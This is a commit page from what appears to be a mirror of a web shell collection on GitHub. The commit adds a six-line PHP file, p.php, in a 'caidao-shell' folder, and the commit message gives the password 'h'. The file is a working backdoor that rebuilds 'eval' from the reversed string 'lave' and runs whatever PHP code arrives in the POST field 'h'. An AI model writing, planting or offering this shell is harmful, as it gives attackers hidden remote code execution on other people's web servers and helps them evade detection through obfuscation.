mirror of
https://github.com/tennc/webshell.git
synced 2025-12-06 04:41:28 +00:00
Create p.php
password: h from: zone.wooyun.org
This commit is contained in:
6
caidao-shell/p.php
Normal file
6
caidao-shell/p.php
Normal file
@@ -0,0 +1,6 @@
|
||||
<?php
|
||||
$a='lave';
|
||||
$b='($_POST[h])';
|
||||
$a=strrev($a);
|
||||
@assert($a.$b);
|
||||
?>
|
||||
Reference in New Issue
Block a user